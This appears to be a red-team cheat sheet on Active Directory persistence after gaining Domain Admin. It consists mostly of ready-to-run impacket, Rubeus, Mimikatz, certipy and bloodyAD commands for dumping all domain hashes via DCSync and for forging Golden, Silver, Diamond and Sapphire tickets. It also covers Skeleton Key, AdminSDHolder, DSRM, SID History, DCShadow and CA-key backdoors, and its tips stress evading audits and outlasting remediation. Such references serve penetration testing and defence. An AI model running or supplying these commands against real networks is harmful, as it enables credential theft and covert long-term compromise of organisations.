Persistence

You have Domain Admin (or equivalent). Now maintain access, extract everything of value, and establish persistence that survives password resets and remediation attempts.

Sections Persistence

DCSync

Replicate credentials from the domain controller remotely. [Requires DA or Replication Rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All)]

Dump all domain hashes.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc

NTLM hashes only (faster).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-ntlm

Target a specific user.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user Administrator

Extract the krbtgt hash (needed for Golden Tickets).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user krbtgt

With hash.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_IP> -hashes :<HASH> -just-dc

Via Kerberos.

terminal.log
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_FQDN> -k -no-pass -just-dc

Via NetExec. [Requires DA]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds

With history (previous passwords, useful for password reuse analysis).

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds --history
Tip
DCSync doesn’t require code execution on the DC. It works remotely by abusing the replication protocol. This is the cleanest way to extract all domain credentials.

Golden Ticket

Forge a TGT for any user using the krbtgt hash. Valid until the krbtgt password is reset twice. [Requires krbtgt NTLM Hash + Domain SID]

Get Prerequisites

Get the domain SID.

terminal.log
root@localhost:~# impacket-lookupsid <DOMAIN>/<USER>:<PASS>@<DC_IP> 0

Get the krbtgt hash (via DCSync).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user krbtgt

Forge and Use

terminal.log
root@localhost:~# impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-psexec <DOMAIN>/Administrator@<DC_HOSTNAME> -k -no-pass
root@localhost:~# impacket-secretsdump <DOMAIN>/Administrator@<DC_FQDN> -k -no-pass

With AES256 key (harder to detect than RC4).

terminal.log
root@localhost:~# impacket-ticketer -aesKey <KRBTGT_AES256> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> Administrator

Forge with custom group membership (e.g., Enterprise Admins for multi-domain).

terminal.log
root@localhost:~# impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -groups 512,519,520 Administrator

From Windows (Rubeus).

terminal.log
PS C:\> .\Rubeus.exe golden /rc4:<KRBTGT_HASH> /user:Administrator /domain:<DOMAIN_FQDN> /sid:<DOMAIN_SID> /nowrap
PS C:\> .\Rubeus.exe ptt /ticket:<BASE64_TICKET>
Tip
Golden Tickets are valid for 10 years by default. The only remediation is resetting the krbtgt password twice (once to rotate, once to invalidate the old key). Most orgs only do it once, which still leaves the previous key valid.

Silver Ticket

Forge a TGS for a specific service using that service account’s hash. Doesn’t touch the DC for validation (no AS-REQ or TGS-REQ). [Requires service account NTLM hash + Domain SID]

CIFS (file share access).

terminal.log
root@localhost:~# impacket-ticketer -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -spn cifs/<TARGET_FQDN> Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-smbclient <DOMAIN>/Administrator@<TARGET_FQDN> -k -no-pass

HTTP (web services, WinRM).

terminal.log
root@localhost:~# impacket-ticketer -nthash <SERVICE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -spn http/<TARGET_FQDN> Administrator

LDAP (DCSync via Silver Ticket).

terminal.log
root@localhost:~# impacket-ticketer -nthash <DC_MACHINE_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN_FQDN> -spn ldap/<DC_FQDN> Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-secretsdump <DOMAIN>/Administrator@<DC_FQDN> -k -no-pass -just-dc
Tip
Silver Tickets never hit the DC for validation, so they’re invisible to DC-level Kerberos logging. The tradeoff is they only work for the specific service you target.

Diamond Ticket

Modify a legitimate TGT by decrypting it with the krbtgt key and altering the PAC. Harder to detect than Golden Tickets because the ticket started as a real, legitimately issued TGT. [Requires krbtgt AES256 Key]

From Windows (Rubeus).

terminal.log
PS C:\> .\Rubeus.exe diamond /krbkey:<KRBTGT_AES256> /user:<USER> /password:<PASS> /enctype:aes /ticketuser:Administrator /domain:<DOMAIN_FQDN> /dc:<DC_FQDN> /ticketuserid:500 /groups:512 /nowrap
Tip
Diamond Tickets are the stealthiest forged ticket variant. They pass detection checks that catch Golden Tickets (like TGT requests without a corresponding AS-REQ) because the base ticket is legitimate.

Sapphire Ticket

Similar to Diamond Ticket, but uses S4U2Self + U2U to obtain a legitimate PAC for the target user, then inserts it into the forged ticket. Even stealthier because the PAC is real, not fabricated. [Requires krbtgt AES256 Key]

From Windows (Rubeus).

terminal.log
PS C:\> .\Rubeus.exe diamond /krbkey:<KRBTGT_AES256> /user:<USER> /password:<PASS> /enctype:aes /ticketuser:Administrator /domain:<DOMAIN_FQDN> /dc:<DC_FQDN> /ticketuserid:500 /groups:512 /tgtdeleg /nowrap
Tip
The /tgtdeleg flag is what makes it a Sapphire Ticket instead of Diamond. It fetches a real PAC for the target user via S4U.

Skeleton Key

Inject a skeleton key into LSASS on the DC. Allows authentication as any user with a master password while real passwords continue to work. [Requires DA + Code Execution on DC]

From Windows (Mimikatz on DC).

terminal.log
PS C:\> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'

Now authenticate as any user with the password “mimikatz”.

terminal.log
root@localhost:~# nxc smb <DC_IP> -u Administrator -p 'mimikatz'
root@localhost:~# nxc smb <DC_IP> -u <ANY_USER> -p 'mimikatz'
root@localhost:~# evil-winrm -i <DC_IP> -u Administrator -p 'mimikatz'
Tip
Skeleton Key doesn’t survive reboots. It only lives in LSASS memory. If the DC restarts, you need to re-inject. Also, it only works on the DC you inject into (not all DCs in the domain).

AdminSDHolder Abuse

Write a backdoor ACE into AdminSDHolder. SDProp (runs every 60 minutes) will propagate it to all protected groups (Domain Admins, Enterprise Admins, Schema Admins, etc.). [Requires DA]

terminal.log
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> add genericAll 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' <BACKDOOR_USER>
Tip
After 60 minutes, <BACKDOOR_USER> will automatically have GenericAll on every protected group and their members. Even if someone removes your DA access, the AdminSDHolder ACE restores it on the next SDProp cycle.

Verify propagation (check if your user has rights on Domain Admins).

terminal.log
root@localhost:~# bloodyAD -u <BACKDOOR_USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> get object 'CN=Domain Admins,CN=Users,DC=domain,DC=local' --attr nTSecurityDescriptor

DSRM Abuse

The DSRM (Directory Services Restore Mode) account is a local administrator on every DC. Its password is set during DC promotion and rarely changed. [Requires DA + Registry Access on DC]

Enable network logon for the DSRM account.

terminal.log
PS C:\> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Or via NetExec.

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> -x 'reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2 /f'

Dump the DSRM hash (it’s the local Administrator hash on the DC).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP>

Note: The DSRM hash appears in the SAM section of secretsdump output (not the NTDS section).

PTH with the DSRM hash.

terminal.log
root@localhost:~# impacket-psexec Administrator@<DC_IP> -hashes :<DSRM_HASH>
Tip
The DSRM password is independent of the domain. Even if all domain passwords are reset, the DSRM hash stays the same unless someone explicitly changes it.

SID History Injection

Inject a privileged SID (like Enterprise Admins) into a user’s SID History. The user inherits all privileges of that SID. [Requires DA]

From Windows (Mimikatz).

terminal.log
root@localhost:~# Invoke-Mimikatz -Command '"sid::patch" "sid::add /sam:<BACKDOOR_USER> /new:<ENTERPRISE_ADMIN_SID>"'
Tip
SID History persists across password resets. The injected SID stays in the user’s token until explicitly removed. Useful for cross-domain escalation when combined with trust abuse.

DCShadow

Register a rogue DC and push malicious changes via replication. Extremely stealthy (changes appear to come from a legitimate DC). [Requires DA + SYSTEM on a DC]

From Windows (Mimikatz, requires two terminals).

terminal.log
# Terminal 1: Register the rogue DC and push changes
root@localhost:~# mimikatz# lsadump::dcshadow /object:<TARGET_USER> /attribute:primaryGroupID /value:512

# Terminal 2: Force replication
root@localhost:~# mimikatz# lsadump::dcshadow /push
Tip
DCShadow is the stealthiest persistence method. Changes bypass most SIEM detections because they look like legitimate AD replication. However, it requires SYSTEM-level access on a domain-joined machine.

AD CS Persistence

Stolen CA Private Key

If you extract the CA’s private key, you can forge any certificate indefinitely. Survives all password resets. [Requires DA + CA Access]

Backup the CA.

terminal.log
root@localhost:~# certipy ca -u Administrator@<DOMAIN_FQDN> -p <PASS> -dc-ip <DC_IP> -ca <CA_NAME> -backup

Forge a certificate for any user.

terminal.log
root@localhost:~# certipy forge -ca-pfx <CA_PFX> -upn Administrator@<DOMAIN_FQDN> -subject 'CN=Administrator,CN=Users,DC=domain,DC=local'

Authenticate with the forged cert.

terminal.log
root@localhost:~# certipy auth -pfx forged.pfx -dc-ip <DC_IP>
Tip
This is the most durable persistence method. The only remediation is revoking the CA’s certificate and rebuilding the entire PKI. Most orgs will never do this.

Rogue Certificate Template

Create or modify a certificate template with ESC1 conditions for future access. [Requires DA]

terminal.log
# Modify an existing template to allow SAN
root@localhost:~# certipy template -u Administrator@<DOMAIN_FQDN> -p <PASS> -dc-ip <DC_IP> -template <TEMPLATE_NAME> -save-old
Tip
Name the template something innocuous and restrict enrollment to a specific group you control. Less likely to be noticed during audits.

Trust Abuse

Parent-Child Trust (SID History via Golden Ticket)

Escalate from child domain to parent domain using a Golden Ticket with an extra SID for Enterprise Admins. [Requires Child Domain krbtgt Hash]

Get the parent domain SID.

terminal.log
root@localhost:~# impacket-lookupsid <PARENT_DOMAIN>/<USER>:<PASS>@<PARENT_DC_IP> 0

Forge Golden Ticket with Enterprise Admins SID from the parent domain.

terminal.log
root@localhost:~# impacket-ticketer -nthash <CHILD_KRBTGT_HASH> -domain-sid <CHILD_DOMAIN_SID> -domain <CHILD_DOMAIN_FQDN> -extra-sid <PARENT_DOMAIN_SID>-519 Administrator
root@localhost:~# export KRB5CCNAME=Administrator.ccache
root@localhost:~# impacket-psexec <PARENT_DOMAIN>/Administrator@<PARENT_DC_HOSTNAME> -k -no-pass

With AES256.

terminal.log
root@localhost:~# impacket-ticketer -aesKey <CHILD_KRBTGT_AES256> -domain-sid <CHILD_DOMAIN_SID> -domain <CHILD_DOMAIN_FQDN> -extra-sid <PARENT_DOMAIN_SID>-519 Administrator
Tip
SID filtering is supposed to prevent this across forest trusts, but it doesn’t apply to parent-child trusts within the same forest. Compromising any child domain in a forest = compromising the entire forest.

Cross-Forest Trust Abuse

If SID filtering is disabled or misconfigured on a forest trust (or if selective authentication is not enforced).

terminal.log
# Enumerate the foreign forest
root@localhost:~# bloodhound-python -c all -u <USER>@<CHILD_DOMAIN_FQDN> -p <PASS> -d <FOREIGN_DOMAIN_FQDN> -ns <FOREIGN_DC_IP> --zip

Check for foreign group memberships (users from your domain in groups of the foreign domain).

terminal.log
root@localhost:~# ldeep ldap -u <USER> -p <PASS> -d <FOREIGN_DOMAIN_FQDN> -s ldap://<FOREIGN_DC_IP> membersof 'Domain Admins'

Grant DCSync Rights (Backdoor)

Grant a controlled user DCSync rights for persistent credential access. [Requires DA]

terminal.log
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> add dcsync <BACKDOOR_USER>

Verify.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<BACKDOOR_USER>:<PASS>@<DC_IP> -just-dc-user krbtgt
Tip
Granting DCSync rights is subtler than adding to Domain Admins. The user doesn’t need to be in any privileged group. They just need two replication ACEs on the domain object.

Machine Account Persistence

Create a machine account and add it to a privileged group. Machine accounts don’t expire and are rarely audited. [Requires DA]

terminal.log
# Create machine account
root@localhost:~# impacket-addcomputer <DOMAIN>/<USER>:<PASS> -computer-name YOURPC01$ -computer-pass 'StrongPass123!' -dc-ip <DC_IP>

# Add to Domain Admins (or another privileged group)
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> add groupMember 'Domain Admins' 'YOURPC01$'

Use it.

terminal.log
root@localhost:~# impacket-psexec <DOMAIN>/YOURPC01$:'StrongPass123!'@<DC_FQDN>
root@localhost:~# impacket-secretsdump /YOURPC01$:'StrongPass123!'@<DC_IP> -just-dc
Tip
Machine accounts blend into the noise. There are usually hundreds of them in any domain. Name yours something that looks like a legitimate workstation.

Persistence Durability Reference

Technique Survives Password Reset Survives krbtgt Reset (x2) Survives DC Reboot Detection Difficulty
Golden Ticket Yes No Yes Medium
Silver Ticket Yes Yes Yes Low
Diamond Ticket Yes No Yes High
Sapphire Ticket Yes No Yes Very High
Skeleton Key Yes Yes No Low
AdminSDHolder Yes Yes Yes Medium
DSRM Yes Yes Yes High
SID History Yes Yes Yes Medium
DCShadow Yes Yes Yes Very High
CA Key Theft Yes Yes Yes Very High
DCSync Rights Yes Yes Yes Medium
Machine Account Yes Yes Yes High